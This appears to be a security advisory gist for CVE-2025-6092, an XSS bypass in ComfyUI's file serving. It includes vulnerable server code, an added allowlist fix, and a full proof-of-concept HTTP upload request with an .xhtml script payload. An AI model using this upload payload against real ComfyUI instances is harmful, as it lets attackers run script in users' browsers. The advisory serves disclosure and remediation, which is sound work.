@superboy-zjc
Last active June 18, 2025 01:48
ComfyUI is Vulnerable to Cross Site Scripting Vulnerability

Summary

ComfyUI is vulnerable to a Cross Site Scripting vulnerability. Attackers can exploit it by uploading .svg, .xhtml, etc. files containing triggerable JavaScript payloads, which bypasses the patch for CVE-2024-10099.

  • Status: Assigned
  • CVE: CVE-2025-6092

Root Cause

The security check added for CVE-2024-10099 only forces a download content type for the .html, .htm, .js and .css file extensions. That patch is not sufficient: modern browsers execute JavaScript embedded in many other file types (for example .svg and .xhtml), and those extensions are still served with a renderable content type.

# https://github.com/comfyanonymous/ComfyUI/blob/97f23b81f3421255ec4b425d2d8f4841207e0cd8/server.py#L481
    ...
    # Denylist check: only these four extensions are forced to download.
    # Any other extension keeps its previously determined content type,
    # so .svg, .xhtml and similar files are still rendered inline by the browser.
    file_extension = os.path.splitext(filename)[1].lower()
    if file_extension in {'.html', '.htm', '.js', '.css'}:
        content_type = 'application/octet-stream'  # Forces download

    return web.FileResponse(
        file,
        headers={
            "Content-Disposition": f"filename=\"{filename}\"",
            "Content-Type": content_type
        }
    )
    ...
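
The snippet above denylists four extensions and lets everything else through. An allowlist is the safer shape: only the image types the endpoint must render inline get a renderable Content-Type, and everything else is forced to download with an attachment disposition and nosniff. The following is an added example written for this page, not ComfyUI's code or its upstream fix; it assumes the same user-controlled filename as the snippet and that the caller passes the returned headers to web.FileResponse.

```python
# Added example, not ComfyUI's code: allowlist-based headers for serving
# uploaded files. Assumes the caller passes the result to web.FileResponse.
import os

# Image types the view endpoint legitimately needs to render inline.
# SVG is deliberately excluded: browsers execute <script> inside it.
SAFE_INLINE_TYPES = {
    ".png": "image/png",
    ".jpg": "image/jpeg",
    ".jpeg": "image/jpeg",
    ".gif": "image/gif",
    ".webp": "image/webp",
}


def _sanitize_filename(filename: str) -> str:
    """Keep only the basename and strip characters that could break the
    Content-Disposition header (quotes, backslashes, CR/LF, non-ASCII)."""
    base = os.path.basename(filename)
    cleaned = "".join(ch for ch in base if 32 <= ord(ch) < 127 and ch not in '"\\')
    return cleaned or "download"


def view_headers(filename: str) -> dict:
    """Return response headers for serving an uploaded file.

    Allowlisted image extensions are rendered inline with a fixed MIME type.
    Anything else (.html, .svg, .xhtml, .xml, ...) is sent as
    application/octet-stream with an attachment disposition so the browser
    never interprets it as a document; nosniff blocks content sniffing.
    """
    ext = os.path.splitext(filename)[1].lower()
    safe_name = _sanitize_filename(filename)
    if ext in SAFE_INLINE_TYPES:
        content_type = SAFE_INLINE_TYPES[ext]
        disposition = f'inline; filename="{safe_name}"'
    else:
        content_type = "application/octet-stream"
        disposition = f'attachment; filename="{safe_name}"'
    return {
        "Content-Type": content_type,
        "Content-Disposition": disposition,
        "X-Content-Type-Options": "nosniff",
    }


def is_rendered_inline(filename: str) -> bool:
    """True when the browser would be allowed to render the file as a document/image."""
    return view_headers(filename)["Content-Type"] != "application/octet-stream"
```

With this shape, a newly discovered scriptable format needs no code change to be blocked; only formats that are explicitly added to the allowlist are ever rendered.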

Proof of Concept

POST /upload/image HTTP/1.1
Host: proof-of-concept:8188
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: csrftoken=N8r6yhMfrAdq3OmDn7P0x0xdrZ5ZrkQk
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Connection: keep-alive
Content-Length: 564

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="image"; filename="poc.xhtml"
Content-Type: image/jpeg

<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1);console.log('bypassed')</a:script>
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="type"

output
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="overwrite"

true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="subfolder"


------WebKitFormBoundary7MA4YWxkTrZu0gW--

comfyUI-xss
